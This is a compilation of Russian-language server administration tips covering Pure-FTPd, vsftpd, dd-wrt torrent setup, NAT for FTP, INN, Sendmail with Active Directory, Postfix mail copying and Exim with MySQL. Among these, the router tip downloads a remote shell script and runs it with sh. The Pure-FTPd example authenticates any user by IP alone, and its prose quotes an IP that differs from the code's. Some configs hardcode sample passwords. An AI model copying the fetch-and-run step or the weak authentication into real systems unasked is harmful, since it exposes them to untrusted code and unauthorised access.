Для Unix систем есть большое количество серверов ftp обладающих богатым функционалом, каждый из которых обладает своими особенностями. Но в один прекрасный день мне потребовалось организовать авторизацию с помощью скрипта, который в зависимости от IP адреса должен был пускать в разные домашние директории. После недолгих поисков в интернете я обнаружил, что у Pure-FTPd авторизация по скрипту - штатная возможность. Итак, приступим. Скачиваем архив с актуальной на текущий момент версии (в момент написания этой статьи текущая версия 1.0.22) wget http://download.pureftpd.org/pub/pure-ftpd/releases/pure-ftpd-1.0.22.tar.bz2 Распаковываем и простыми сочетаниями команд устанавливаем ./configure --with-rfc2640 --with-everything --prefix=/usr/local/pure-ftpd make sudo make install --with-rfc2640 - необходима для перекодировки названий файлов на лету в разные кодировки (в моем случае клиенты подсоединяются к серверу с кодировкой cp1251 а на сервере же кодировка UTF-8) --with-everything - создание демона с поддержкой всех функций Pure-FTPd --prefix=/usr/local/pure-ftpd - каталог, куда собственно демон устанавливать Теперь когда сервер установлен переходим к базовой конфигурации. Копируем конфигурационный файл в /etc из каталога с исходниками cp configuration-file/pure-ftpd.conf /etc/pure-ftpd.conf Добавляем следующие строки в конфигурационный файл: ExtAuth /var/run/ftpd.sock # Включаем авторизацию по скрипту UserBandwidth 100 # Ограничиваем полосу в 100 Kb/c для каждого пользователя, # чтобы они не забивали весь канал MaxDiskUsage 90 # Установив это значение, мы запрещаем загрузку файлов на сервер, # в случае если осталось всего 10% свободного места FileSystemCharset UTF-8 # Говорим что на сервере кодировка UTF-8 ClientCharset CP1251 # А у пользователей CP1251 Создаем авторизующий скрипт /usr/local/pure-ftpd/sbin/ftp-auth-handler Со следующим содержанием: if test "$AUTHD_REMOTE_IP" = "192.168.0.102"; then echo 'auth_ok:1' echo 'uid:69' echo 'gid:42' echo 'dir:/tmp' else echo 'auth_ok:0' fi echo 'end' Этот скрипт успешно авторизует любого пользователя с IP 192.168.0.201 Кроме $AUTHD_REMOTE_IP в скрипте можно использовать следующие переменные: AUTHD_ACCOUNT AUTHD_PASSWORD AUTHD_LOCAL_IP AUTHD_LOCAL_PORT AUTHD_REMOTE_IP AUTHD_ENCRYPTED В ответе скрипта можно передавать следующие параметры uid:xxx - UID пользователя в системе gid:xxx - GID пользователя в системе dir:xxx - Абсолютный путь до домашней директории throttling_bandwidth_ul:xxx - Ширина канала закачки на сервер throttling_bandwidth_dl:xxx - Ширина канала скачки с сервера user_quota_size:xxx - Дисковая квота пользователя в байтах user_quota_files:xxx - Максимальное количество файлов для пользователя per_user_max:xxx - Максимальное количество одновременных сессий После этого осталось запустить сам сервер. Скопируем запускающий скрипт pure-config.pl из каталога с исходниками cp configuration-file/pure-config.pl /usr/local/pure-ftpd/sbin/ Для запуска сервера выполняем следующую команду: /usr/local/pure-ftpd/sbin/pure-config.pl /etc/pure-ftpd.conf Для запуска демона авторизации выполняем это: /usr/local/pure-ftpd/sbin/pure-authd -s /var/run/ftpd.sock -r /usr/local/pure-ftpd/sbin/ftp-auth-handler & Осталось внести последние две строчки в автозагрузку, и на этом базовая настройка сервера закончена.

Установка torrent-демона transmission на маршрутизаторе Linksys WRT54GL (доп. ссылка 1) Автор: Roman Sozinov [комментарии]

Железо - Linksys WRT54GL (v1.1) + NAS (HDD, доступный через CIFS/SMB), OS - dd-wrt v.24. Потребность - закрутить на всём этом хозяйстве torrent-демон transmission с возможностью управления закачками через web. Сперва стоит позаботиться о том, чтобы файловая система jffs работала без проблем и была примонтирована (/jffs, NAS как раз для этого и нужен). На её основе будет построена новая ветка /jffs/opt, в которую будет установлены все необходимые для работы transmission пакеты Optware. # mkdir /jffs/opt # mount -o bind /jffs/opt /opt Далее необходимо пройти минимальную установку Optware: # wget http://www.3iii.dk/linux/optware/optware-install-ddwrt.sh -O /tmp/optware-install.sh # sh /tmp/optware-install.sh Теперь можно запускать установку transmission, установив прежде переменную PATH: # export PATH=/opt/bin:/opt/sbin:$PATH # ipkg-opt install transmission Домашней директорией для transmission будет /jffs/torrents, поэтому запускаем демон, указав необходимые параметры /opt/bin/transmission-daemon -g /jffs/torrents/.config/transmission-daemon -a "192.168.1.33" killall transmission-daemon Запустив однажды transmission, создаётся дерево служебных подкаталогов, скаченные файлы складываются в корень созданной структуры (/jffs/torrents), конфигурационный файл - /jffs/torrents/.config/transmission-daemon/settings.json: /jffs/torrents/.config/ /jffs/torrents/.config/transmission-daemon /jffs/torrents/.config/transmission-daemon/settings.json /jffs/torrents/.config/transmission-daemon/stats.json /jffs/torrents/.config/transmission-daemon/blocklists /jffs/torrents/.config/transmission-daemon/resume /jffs/torrents/.config/transmission-daemon/torrents Остаётся открыть порт 9091 для доступа к web-интерфейсу /usr/sbin/iptables -I INPUT 1 -p tcp --dport 9091 -j logaccept и добавить запуск transmission в startup-скрипт mount -o bind /jffs/opt /opt export PATH=/opt/bin:/opt/sbin:$PATH /opt/bin/transmission-daemon -g /jffs/torrents/.config/transmission-daemon Web-интерйейс доступен с компьютера 192.168.1.33 по адресу http://host:9091/transmission/web/.

Настройка pure-ftpd в Debian GNU/Linux, с хранением учетных записей в PureDB (доп. ссылка 1) Автор: Heckfy [комментарии]

Цель - отделить пользователей из /etc/passwd от пользователей ftp, но не устанавливая различных внешних средств для хранения базы пользователей. Из целого ряда ftp-серверов я остановился на pure-ftpd. Вариант запуска был найден быстро, но при этом сервер должен был запускаться средствами (x)inetd: $ grep pure /etc/inetd.conf ftp stream tcp nowait root /usr/sbin/tcpd /usr/sbin/pure-ftpd-virtualchroot -4 -A -E -d -lpuredb:/etc/pure-ftpd/pureftpd.pdb Сделал так на другом сервере и понял, что у меня там нет inetd. Устанавливать не стал. Решил сделать сервис standalone. # dpkg-reconfigure pure-ftpd-common Конечно, однострочные конфиги, раскиданные по разным файлам, могут вызвать отторжение у сторонников другого подхода, но сейчас не об этом. # /etc/init.d/pure-ftpd restart Restarting ftp server: Running: /usr/sbin/pure-ftpd-virtualchroot -l pam -d -4 -u 1000 -A -E -O clf:/var/log/pure-ftpd/transfer.log -B Выключаю pam и включаю puredb # rm /etc/pure-ftpd/conf/PAMAuthentication /etc/pure-ftpd/auth/70pam # ln -s ../conf/PureDB /etc/pure-ftpd/auth/45puredb Работа с учетными записями производится посредством pure-pw. В заключение, пример рабочей конфирурации: $ grep -r . /etc/pure-ftpd/*/ /etc/pure-ftpd/auth/45puredb:/etc/pure-ftpd/pureftpd.pdb /etc/pure-ftpd/auth/65unix:no /etc/pure-ftpd/conf/UnixAuthentication:no /etc/pure-ftpd/conf/VerboseLog:Yes /etc/pure-ftpd/conf/IPV4Only:Yes /etc/pure-ftpd/conf/MinUID:10000 /etc/pure-ftpd/conf/ChrootEveryone:Yes /e tc/pure-ftpd/conf/NoAnonymous:yes /etc/pure-ftpd/conf/PureDB:/etc/pure-ftpd/pureftpd.pdb /etc/pure-ftpd/conf/AltLog:clf:/var/log/pure-ftpd/transfer.log

Как быстро расшарить директории через ftp в Linux Автор: borey [комментарии]

На моей станции поднят ftp сервер (vsftpd). Как известно FTP cервер позволяет расшарить определённую директорию (в нашем случае /var/ftp/)/ Часто у меня возникали ситуации когда нужно что то расшарить по сети, а копировать это в раздел где расшаренная директория - места нет. Да и копировать это опять же или менять кофиг сервера и перерапускать сервис. Для себя нашёл очень простой и удобный способ как это сделать. Монтировать нужные директории в дерево /var/ftp используя 'mount --bind '. всё просто. [root@n100851 ~]# mkdir /var/ftp/pub/music [root@n100851 ~]# mount --bind /home/user/media/sound/ /var/ftp/pub/music/ и всё. анонимусы могут забирать музыку с FTP сервера.

Как гибко манипулировать настройками vsftp для разных сетей Автор: dimus [комментарии]

Допустим у нас есть сеть 192.168.0.0/24, с которой надо что-то разрешить, а для остальных - запретить. Редактируем файл /etc/hosts.allow vsftpd: 192.168.0.0/255.255.255.0, 127.0.0.1: setenv VSFTPD_LOAD_CONF / etc/vsftpd-int.conf : nice 15 vsftpd: ALL : nice 15 В результате при коннекте из нашей сети будет выполняться конфиг /etc/vsftpd-int.conf, а при коннекте из остальных сетей - /etc/vsftpd.conf Ну а прописать в разных конфигах разные фичи я думаю проблем не составит. У меня так регулируется скорость: cat /etc/vsftpd-int.conf ...тут пропущен здоровый кусок конфига # Этот конфиг для внутренних нужд - скорость по максимуму anon_max_rate=0 local_max_rate=0 cat /etc/vsftpd.conf ...тут пропущен здоровый кусок конфига anon_max_rate=32000 local_max_rate=64000

Пример настройки vsftpd (доп. ссылка 1) [комментарии]

/etc/vsftpd.conf: # Запускаем как демон, а не из inetd. listen=YES background=YES listen_address=192.168.1.1 # Включаем возможность использования tcpwrapper, лимиты через /etc/hosts.allow tcp_wrappers=YES # Пускаем только пользователей имеющих валидный shell, присутствующий в /etc/shells check_shell=YES # Вместо реальных владельцев файлов всегда показываем ftp:ftp hide_ids=YES # Общее максиамльно допустимое число коннектов. max_clients=100 # Разрешенное число коннектов с одного IP. max_per_ip=5 # Таймаут при ожидании команды idle_session_timeout=300 # Таймаут при передаче данных data_connection_timeout=60 # Непривилегированный пользователь, для того чтобы делать под ним, что можно выполнить без root. nopriv_user=ftp # Запрещаем рекурсивный вызов "ls -R" ls_recurse_enable=NO # Ограничение скорости прокачки для анонимных и локальных пользователей (байт в сек.) anon_max_rate=50000 local_max_rate=100000 # Включаем ведение лога операций. xferlog_enable=YES vsftpd_log_file=/var/log/vsftpd.log # Расширенные логи всех команд log_ftp_protocol=YES # ------------ Настрйоки для анонимного сервера # Если сервер публичный, пускающий анонимных пользователей anonymous_enable=YES anon_umask=077 # Корень анонимного ftp архива anon_root=/usr/local/ftp # Запрещаем анонимным пользователям запись данных, если нужно разрешить # запись для локальных пользовтелей (write_enable=YES) anon_upload_enable=NO # Запрещаем создавать директории. anon_mkdir_write_enable=NO # Запрещаем переименовывать и удалять anon_other_write_enable=NO # Если нужно запретить доступ к определенным типам файлов по маске # deny_file={*.mp3,*.mov, *.avi, .filelist} # Если нужно скрыть определенные типы файлов при выводе списка, # но дать скачать тем кто знает точное имя. # hide_file={*.mp3,*.mov, *.avi} # Если анонимную закачку необходимо разрешить, нужно дополнительно # использовать chown_uploads=YES и chown_username=ftp_anon_user # Если нужно пускать анонимных пользователей только при правильном введении # email (аналог паролей для ограничения доступа к публичному ftp), заданного в # файле определенном директивой email_password_file, нужно установить # secure_email_list_enable=YES # ------------ Настрйоки для входа локальных пользователей # Если сервер разрешает вход локальных пользователей, присутствующих в системе local_enable=YES # "-rw-r--r--" local_umask=022 # Разрешаем показ файлов начинающихся с точки (например, .htaccess) для кривых ftp-клиентов force_dot_files=YES # Разрешаем пользователям записывать/изменять свою информацию на сервер. # если нужно запретить запись данных - write_enable=NO # Более тонкий тюнинг через "cmds_allowed=PASV,RETR,QUIT" write_enable=YES # Для всех пользователей делаем chroot, делаем корнем их домашнюю директорию, # Список логинов для которых не нужно делать chroot задаем в vsftpd.chroot_list chroot_local_user=YES chroot_list_enable=YES chroot_list_file=/etc/vsftpd.chroot_list # Активируем список пользователей которым запрещен вход по FTP (например, root) userlist_enable=YES userlist_file=/etc/ftpusers

Особенности использование ftp из-за фаервола ipfw/natd Автор: globus [комментарии]

Необходимо выпустить пользователей на ftp сайты из локальной сети, но при этом не устанавливая дополнительного ПО, используя только возможности FreeBSD 4.10. Этими возможностями, как ни странно, оказались ipfw и natd вот собственно как все это прописывается. Исходные данные, FreeBSD 4.10 + настроенный nat правила для ipfw ipfw -q add 100 divert natd from 192.168.20.0/24 to any 20, 21 out via $oif ipfw -q add 200 divert natd from any 20, 21 to $iip in via $oif ipfw -q add 300 allow tcp from any to any established ipfw -q add 400 allow tcp from any to any setup где $oif и $iip соответственно внешний интерфейс и внешний IP теперь запускаем natd /sbin/natd -m -s -u -punch_fw 500:200 -n xl1 заострю внимание на параметре "-punch_fw" -этот параметр создает в фаерволе "ходы", добавляя динамические правила. В моем случае эти правила начнутся с номера 500 и будет их добавлено максимум 200 (понятно чем больше сеть, те больше нужно правил). Особое спасибо A Clockwork Orange.

Как настроить NAT (транслятор адресов) для нормальной работы с FTP и ICQ в Linux [комментарии]

iptables: modprobe iptable_nat modprobe ip_conntrack_ftp modprobe ip_nat_ftp modprobe ip_nat_irc ipchains: modprobe ip_masq_ftp modprobe ip_masq_raudio modprobe ip_masq_irc modprobe ip_masq_icq

Как обеспечить работу active FTP режима в FreeBSD NAT [обсудить]

В ipnat воспользуйтесь модулем ftp proxy: map fxp0 0/0 -> 0/32 proxy port ftp ftp/tcp map rl0 172.16.33.0/24 -> 212.46.231.50/32 proxy port ftp ftp/tcp не забудьте поместить правило трансляции ftp перед общим правилом трансляции, порядок следования правил важен.

INN

Как после краха INN перестроить group.index и содержимое overview [обсудить]

makehistory -O -x -F

Почему INN не запускается и ругается на отсутствие файла history Автор: Andrey Slusar [обсудить]

makehistory -b -f history -O -l 30000 -I makedbz -f history -i -o -s 30000

Mail, почта

Безопасность и установка ограничений

Борьба со спамом, фильтрация почты

Отправка и пересылка сообщений на уровне пользователя

Использование Sendmail в качестве буфера MS Exchange в MS Active Directory Автор: Дмитрий Казаров [комментарии]

Описание задачи Имеется:
Компания с несколькими офисами по всему миру
Много доменная структура на базе Microsoft Active Directory
Внутренняя почта на серверах MS Exchange Server 2007, которые, по разным соображениям, не желательно выставлять в интернет.
Шлюзы в интернет на базе FreeBSD 8+ Нужно настроить Sendmail на пересылку почты из интернета в Exchange и обратно, с учётом требований
адекватной защитой от спама и вирусов
максимальной интеграцией в АД
обслуживание множества почтовых доменов и доменов АДа.
SMTP AUTH по учётным записям домена для любителей путешествовать. Решение Для начала интегрируем шлюз в АД. Это понадобится и для SMTP AUTH и для авторизации в Squid-е и ещё много для чего. 1. Подготовка системы. 1.1. Устанавливаем samba. cd /usr/ports/net/samba35/ make install clean При настройке пакета нам понадобиться только параметры ADS (With Active Directory support) и WINBIND (With WinBIND support). Остальные параметры - по желанию и умению. Первым делом создаём файл /etc/krb5.conf [logging] default = SYSLOG [libdefaults] default_realm = MSK.LAN clockskew = 300 default_tgs_enctypes = RC4-HMAC DES-CBC-CRC DES-CBC-MD5 default_tkt_enctypes = RC4-HMAC DES-CBC-CRC DES-CBC-MD5 preferred_enctypes = RC4-HMAC DES-CBC-CRC DES-CBC-MD5 ticket_lifetime = 21600 [realms] MSK.LAN = { kdc = Ad-Srv0.msk.lan:88 admin_server = Ad-Srv0.msk.lan:464 default_domain = msk.lan } GER.LAN = { kdc = Ad-Srv0.ger.lan:88 } TWN.LAN = { kdc = Ad-Srv0.twn.lan:88 } [domain_realm] .msk.lan = MSK.LAN .ger.lan = GER.LAN .twn.lan = TWN.LAN Настраиваем Samba. В данном случае нужен только сервис разрешения имён - остальное отключено за не надобностью. [global] server string = FreeBSD GateWay security = ADS kerberos method = system keytab hosts allow = 192.168.88. 127. load printers = no encrypt passwords = yes winbind separator = + winbind use default domain = yes winbind uid = 10000-15000 winbind gid = 10000-15000 winbind enum users = yes winbind enum groups = yes log file = /var/log/samba/log.%m max log size = 50 password server = Ad-Srv0.msk.lan workgroup = MSKLAN realm = MSK.LAN interfaces = 192.168.88.0/24 socket address = 192.168.88.254 dns proxy = no Следующий шаг - синхронизация времени между доменными серверами и шлюзом. Так как на шлюзе точное глобальное время - синхронизирую по нему контроллеры домена. И наконец интеграция в домен: net ads join -U Administrator@MSK.LAN и создание файла /etc/krb5.keytab net ads keytab create и добавляем строку в /etc/crontab 0 * * * * root /usr/local/bin/net ads kerberos kinit -P она позволит программам, умеющим использовать sasl2, работать в АДе без ввода пароля, используя учётную запись сервера, что позволяет не хранить пароли в скриптах. Добавляем в /etc/rc.conf: winbindd_enable=YES И запускаем его /usr/local/etc/rc.d/samba 1.2. Установка cyrus sasl2: cd /usr/ports/security/cyrus-sasl2 make install clean При настройке порта необходимы только параметры AUTHDAEMOND (Enable use of authdaemon), LOGIN (Enable LOGIN authentication), PLAIN (Enable PLAIN authentication) - остальные на своё усмотрение. Сборка, установка - как обычно, дополнительных настроек ни каких делать не обязательно. 1.3 Установка saslauthd пакета cyrus sasl2 cd /usr/ports/security/cyrus-sasl2-saslauthd make install clean Параметры пакета в данном случае ни на что не влияют. Создаём файл /usr/local/etc/pam.d/smtp со следующим содержимым: auth sufficient pam_krb5.so no_user_check validate account sufficient pam_permit.so добавляем пару строк в /etc/rc.conf saslauthd_enable=YES saslauthd_flags='-a pam -c -t 3600' и запускаем сервис /usr/local/etc/rc.d/saslauthd start И проверяем, что это всё работает: # testsaslauthd -s smtp -u user -p 'password' 0: OK "Success." Если ответ другой - разобраться поможет режим отладки saslauthd -a pam -n 0 -d . 1.4. Установка клиента openldap. cd /usr/ports/net/openldap24-client make install clean Необходим параметр SASL (With (Cyrus) SASL2 support). После установки добавляем пару строк в /usr/local/etc/openldap/ldap.conf BASE dc=MSK,dc=lan URI ldap://msk.lan Проверяем, что ldapsearch работает как надо: ldapsearch -z 1 '(objectclass=user)' Должно получиться что-то типа: SASL/GSSAPI authentication started SASL username: SRV-GW$@MSK.LAN SASL SSF: 56 SASL data security layer installed. # extended LDIF # # LDAPv3 # base <dc=MSK,dc=lan> (default) with scope subtree # filter: (objectclass=user) # requesting: ALL # # SRV05, Servers, Central Office, Offices, msk.lan dn: CN=SRV05,OU=Servers,OU=Central Office,OU=Offices,DC=MSK,DC=lan objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user objectClass: computer cn: SRV05 userCertificate:: MII... 1.5 Установка антивируса. cd /usr/ports/security/clamav make install clean Среди параметров обязательно нужен MILTER (Compile the milter interface). Добавляем в /etc/rc.conf несколько строк clamav_clamd_enable=YES clamav_milter_enable=YES clamav_freshclam_enable=YES и запускаем сервисы: /usr/local/etc/rc.d/clamav-clamd /usr/local/etc/rc.d/clamav-milter /usr/local/etc/rc.d/clamav-freshclam 2. Настройка sendmail-а. 2.1. Собираем sendmail c поддержкой SASL2. Добавляем в файл /etc/make.conf строки SENDMAIL_CFLAGS=-I/usr/local/include -DSASL=2 SENDMAIL_LDFLAGS=-L/usr/local/lib SENDMAIL_LDADD=-lsasl2 и пересобираем sendmail: cd /usr/src/usr.sbin/sendmail make clean obj all install 2.2. Настраиваем маршрутизацию писем и прочие функции sendmail-а. Создаём файл /etc/mail/relay-domains и прописываем в нём все почтовые домены, обслуживаемые данным почтовым сервером domain1.ru domain2.ru domain3.tw В файл /etc/mail/mailertable вносим информацию о серверах Exchange, принимающих почту этих доменов. domain1.ru esmtp:srv-exch.msk.lan domain2.ru esmtp:srv-exch.msk.lan domain3.tw esmtp:srv-exch.twn.lan Создаём SSL-ные ключи для Sendmail-а mkdir -p /etc/mail/SSL cd /etc/mail/SSL openssl req -new -x509 -keyout cakey.pem -out cacert.pem -days 365 openssl req -nodes -new -x509 -keyout sendmail.pem -out sendmail.pem -days 365 Рекомендация: в поле "Common Name" указывайте полное доменное имя этого SMTP сервера, в том виде, как оно прописано в DNSе в полях MX. 2.3 Настраиваем файлы конфигурации sendmail-а cd /etc/mail make Редактируем файл `hostname`.mc, он должен принять примерно следующий вид. VERSIONID(`$FreeBSD: src/etc/sendmail/freebsd.mc,v 1.37.2.3 2011/06/20 01:48:49 gshapiro Exp $') OSTYPE(freebsd6) DOMAIN(generic) define(`confDOMAIN_NAME', `mx.domain.ru')dnl FEATURE(access_db) FEATURE(blacklist_recipients) FEATURE(local_lmtp) FEATURE(mailertable) FEATURE(virtusertable) define(`confDONT_BLAME_SENDMAIL',`GroupReadableSASLDBFile')dnl define(`confCACERT_PATH', `/etc/mail/SSL')dnl define(`confCACERT', `/etc/mail/SSL/cacert.pem')dnl define(`confSERVER_CERT', `/etc/mail/SSL/sendmail.pem')dnl define(`confSERVER_KEY', `/etc/mail/SSL/sendmail.pem')dnl define(`confCLIENT_CERT', `/etc/mail/SSL/sendmail.pem')dnl define(`confCLIENT_KEY', `/etc/mail/SSL/sendmail.pem')dnl TRUST_AUTH_MECH(`PLAIN LOGIN')dnl define(`confAUTH_MECHANISMS', `PLAIN LOGIN')dnl define(`confAUTH_OPTIONS', ``A,p,y'')dnl FEATURE(`require_rdns')dnl FEATURE(`delay_checks')dnl FEATURE(`blacklist_recipients')dnl FEATURE(dnsbl, `blackholes.mail-abuse.org', ``"550 Mail from " $&{client_addr} " rejected, see http://mail-abuse.org/cgi-bin/lookup?" $& {client_addr}'') FEATURE(`enhdnsbl', `bl.spamcop.net', `"Spam blocked see: http://spamcop.net/bl.shtml?"$&{client_addr}', `t')dnl FEATURE(`dnsbl', `zen.spamhaus.org', `"Spam blocked see: http://www.spamhaus.org/query/bl?ip="$&{client_addr}', `t')dnl INPUT_MAIL_FILTER(`clmilter',`S=local:/var/run/clamav/clmilter.sock,F=,T=S:4m;R:4m')dnl define(`confCW_FILE', `-o /etc/mail/local-host-names') dnl Enable for both IPv4 and IPv6 (optional) DAEMON_OPTIONS(`Name=NoMTA, Addr=127.0.0.1, M=EA')dnl DAEMON_OPTIONS(`Name=IPv4, Family=inet') dnl DAEMON_OPTIONS(`Name=IPv6, Family=inet6, Modifiers=O') DAEMON_OPTIONS(`Family=inet, Port=465, Name=MTA-SSL, M=s')dnl CLIENT_OPTIONS(`Family=inet, Address=mx.domain.ru') define(`confBIND_OPTS', `WorkAroundBrokenAAAA') define(`confNO_RCPT_ACTION', `add-to-undisclosed') define(`confPRIVACY_FLAGS', `authwarnings,noexpn,novrfy') MAILER(local) MAILER(smtp) Здесь строка define(`confDOMAIN_NAME', `mx.domain.ru')dnl должна содержать публичное доменное имя этого почтового сервера, которое прописывается в DNS-е в записях МХ. Аналогично со строкой CLIENT_OPTIONS(`Family=inet, Address=mx.domain.ru'). Строки TRUST_AUTH_MECH(`PLAIN LOGIN')dnl define(`confAUTH_MECHANISMS', `PLAIN LOGIN')dnl включают SMPT авторизацию, но так как saslauthd авторизует с помощью PAM в Kerberos-е, можно использовать только пароль в открытом виде. Другие способы, хотя и более безопасные на уровне SMTP требуют наличия открытого пароля на стороне сервера и в нашем случае не доступны. Проблема безопасности паролей решается принуждением почтового клиента использовать шифрование транспорта (TLS или SSL) с помощью следующего параметра: define(`confAUTH_OPTIONS', ``A,p,y'')dnl Остальные параметры хорошо описаны в /usr/share/sendmail/cf/README и прочей документации. Добавляем в /etc/rc.conf строку sendmail_enable=YES и приводим в действие этот файл конфигурации: cd /etc/mail make make install /etc/rc.d/sendmail restart 2.4 Настройка списка адресатов. Осталась одна чрезвычайно важная деталь - эта настройка приводит к тому, что sendmail отправляет Exchange-ам всю почту пришедшую на наши почтовые домены, не проверяя существуют ли адресаты или нет. Разумеется, получив от Exchange-а отказ из-за отсутствия получателя, sendmail пытается уведомить об этом отправителя, но в большинстве слуаев его не существует - спам он и есть спам. Это набивает очередь sendmail-a не доставимыми письмами, забивает ящик postmaster-а письмами о не возможности доставки, но, что гораздо хуже, даёт дополнительную нагрузку на Exchange. Существуют несколько путей решения проблемы: на пример, можно запрашивать в АДе по LDAPу существования получателя. Если у вас только один АДовский домен - задача делается тройкой команд в .mc . Если больше - придётся ручками вставлять команды sendmail-a по аналогии с готовыми. Но в результате - доменный контроллер будет довольно сильно нагружен поисками несуществующих адресатов, каждый из которых подразумевает полный проход по базе. Доменный контроллер - не самый лучший кандидат для такой нагрузки, у него много своих собственных задач. Гораздо логичнее кешировать данные о существуюших адресатах в небольшой базе на самом почтовике. И наиболее подходящей для этой цели является база access. Для наполнения этой базы можно воспользоваться следующим скриптом (у меня он записан в файл /etc/mail/LDAP2AccessDB): #!/bin/sh # This filter selects groups (all) and users that are not disabled. #Filter='(&(proxyaddresses=smtp:*)(|(&(objectClass=User) #(!(userAccountControl:1.2.840.113556.1.4.803:=2))) #(objectClass=Group)))' # All users that has Exchange account. Filter='(&(proxyaddresses=smtp:*)(|(objectClass=User)(objectClass=Group)))' Domains='Msk Twn' Msk_URL='ldap://msk.lan' Msk_BDN='dc=msk,dc=lan' Msk_Pfx='/usr/sbin/jail / tmp 192.168.88.254 ' Msk_Aut='' Twn_URL='ldap://twn.lan' Twn_BDN='dc=twn,dc=lan' Twn_Pfx='/usr/sbin/jail / tmp 192.168.88.254 ' Twn_Aut='' OKeyed_domains='subdom.domain1.ru' Relayed_Nets='192.168 127.0' cd /etc/mail ( for d in ${Relayed_Nets}; do echo -e "Connect:$d\tRELAY"; done for d in ${OKeyed_domains}; do echo -e "To:$d\tOK"; done for dom in $Domains; do eval url="\$${dom}_URL" bdn="\$${dom}_BDN" pfx="\$${dom}_Pfx" auth="\$${dom}_Aut" $pfx /usr/local/bin/ldapsearch $auth -QLLL -H "$url" -b "$bdn" "$Filter" proxyaddresses || kill $$ done | /usr/bin/tr '[:upper:]' '[:lower:]' | sed -n 's/^proxyaddresses: *smtp: *//p' | sort -t@ +1 +0 | sed 's/.*/To:& RELAY/' sed 's/#.*//;s/[ ]*//;/^$/d;s/.*/To:& ERROR:"User _really_ unknown. Honestly!"/' relay-domains ) > access.new || exit 254 /usr/bin/cmp access access.new > /dev/null 2>&1 || { [ -d old.accesses ] || mkdir old.accesses || { echo Can not create dir \"old.accesses\"; exit 1; } mv access old.accesses/access.`date +%Y%m%d-%H%M` mv access.new access make maps } В данном скрипте Domains - список АДных доменов, из которых собирается список адресатов. <Domain_Name>_URL - URI ссылающийся на сервер LDAPа домена АДа, <Domain_Name>_BDN - адрес начала поиска в дереве LDAP, <Domain_Name>_Pfx - команда, выполняющая команду ldapsearch - setfib, jail, chroot и прочее. В моём случае используется jail для обхода некоторый особенностей маршрутизации внутри VPN тунелей, такой метод вызова позволяет заставить ldapsearch использовать внутренний адрес при запросе. <Domain_Name>_Aut - параметр для авторизации, если домен не принимает авторизацию в домене с помощью SASL2, настроенную в п 1.1 OKeyed_domains - список почтовых (под) доменов, которые необходимо пересылать. Если в домене domain1.ru, адресаты которого находятся на сервере Exchange, есть поддомен sub.domain1.ru, обслуживаемый другой почтовой системой, данная схема настройки sendmail-а не позволит пользователям Exchange-а посылать туда письма. Добавление такого домена в OKeyed_domains позволит исключить его из списка блокируемых доменов. Relayed_Nets - список базовых IP адресов сетей или IP адресов компьютеров, почта которых пересылается на произвольные адреса без предварительной авторизации с помощью SMTP AUTH. Добавляем строку в /etc/crontab */15 * * * * root /etc/mail/LDAP2AccessDB > /dev/null Заключение Собственно - всё! Должно работать. Литература
Настройка Sendmail + SASL2 + TLS/SSL
Samba + AD
Active Directory and Cyrus SASL Authentication
Sendmail WiKi по-русски

Аудит входящей и исходящей почты для определенных ящиков в Postfix [комментарии]

В main.cf добавляем recipient_bcc_maps = hash:/etc/postfix/recipient_bcc sender_bcc_maps = hash:/etc/postfix/sender_bcc Далее в файлы recipient_bcc и sender_bcc добавляем информацию с каких и на какие адреса нужно копировать почту. Например: user1@etest.ru admin@test.ru После внесения изменений не забываем перестроить хэш: postmap recipient_bcc postmap sender_bcc

Настройка почтового сервера на базе Exim, MySQL и Dovecot во FreeBSD (доп. ссылка 1) Автор: Денис Кучерский [комментарии]

Задача: необходимо установить и настроить почтовый сервер для нескольких почтовых доменов. В качестве МТА я выбрал Exim. Список доменов, пользователей и т.д. будут хранится в MySQL. Итак, что мы имеем: ОС FreeBSD, на сервере 8 ip-адресов, MySQL сервер уже установлен. Приступаем к установке: 1. Добавляем в /etc/make.conf опции для сборки exim (так же у меня указана версия MySQL, c которой собираются порты и в которых используется MySQL): DEFAULT_MYSQL_VER=51 .if ${.CURDIR:N*/usr/ports/mail/exim} == "" WITH_MYSQL=yes WITH_SPF=yes WITH_SRS=yes WITHOUT_IPV6=yes WITHOUT_MAILSTORE=yes WITHOUT_MBX=yes WITHOUT_PASSWD=yes WITHOUT_PAM=yes WITHOUT_AUTH_SPA=yes WITHOUT_NIS=yes .endif 2. Устанавливаем exim с поддержкой MySQL из портов: cd /usr/ports/mail/exim ; make install clean ; echo 'exim_enable="YES"' >> /etc/rc.conf 3. Заменяем sendmail в /etc/mail/mailer.conf на exim: sendmail /usr/local/sbin/exim send-mail /usr/local/sbin/exim mailq /usr/local/sbin/exim -bp newaliases /usr/local/sbin/exim -bi hoststat /usr/local/sbin/exim purgestat /usr/local/sbin/exim 4. Создаём директорию, в которую exim будет складывать почту (у меня это /home/mail/domains) mkdir -p /home/mail/domains ; chown -R mailnull:mail /home/mail 5. Создаём БД для exim: mysqladmin -u root -p create exim_db 6. Создаём пользователя MySQL и выделяем ему права на БД: echo "GRANT SELECT, INSERT, UPDATE, LOCK TABLES, CREATE, DROP, DELETE, INDEX ON exim_db.* TO exim@localhost IDENTIFIED BY 'Mta_MaileR'" | mysql -u root -p mysql 7. Создаём структуру таблиц (описание таблиц и полей в конце статьи): fetch -v http://www.sysadminpages.com/files/exim/exim_db.sql mysql -u exim -p exim_db < exim_db.sql 8. Подключаемся к БД и добавляем записи для 1-го почтового домена (Для примера взял вымешленые имя домена и ip-адрес. Для рабочего почтового сервера необходимо заменить значения на реальные): mysql -u exim -p exim_db mysql>INSERT INTO domains VALUES('example.local','mail.example.local','10.1.10.1'); mysql>INSERT INTO accounts (login, password, maildir, uid, gid, mailquota) VALUES ('admin@example.local', 'Pass4Admin', '/home/mail/domains/example.local/admin/Maildir', 26, 26, 2000); 9. Конфигурируем exim. Конфиг длинный, и поэтому его описание я опускаю. Рабочий конфиг можно взять по адресу: https://www.opennet.ru/soft/exim.config 10. Запускаем exim /usr/local/etc/rc.d/exim start 11. Для проверки работоспособности отправляем тестовое письмо mail -s 'test message' admin@example.local test message . Смотрим лог exim: tail /var/log/exim/mainlog Если всё правильно настроено, то в логе будут записи примерно следующего содержания: 2009-07-06 08:26:54 1MNnHZ-000CJx-U5 <= root@srv.example.local U=root P=local S=363 2009-07-06 08:26:54 1MNnHZ-000CJx-U5 => admin <admin@example.local> R=localuser T=local_delivery 2009-07-06 08:26:54 1MNnHZ-000CJx-U5 Completed 12. Устанавливаем dovecot cd /usr/ports/mail/dovecot make WITH_SSL=yes 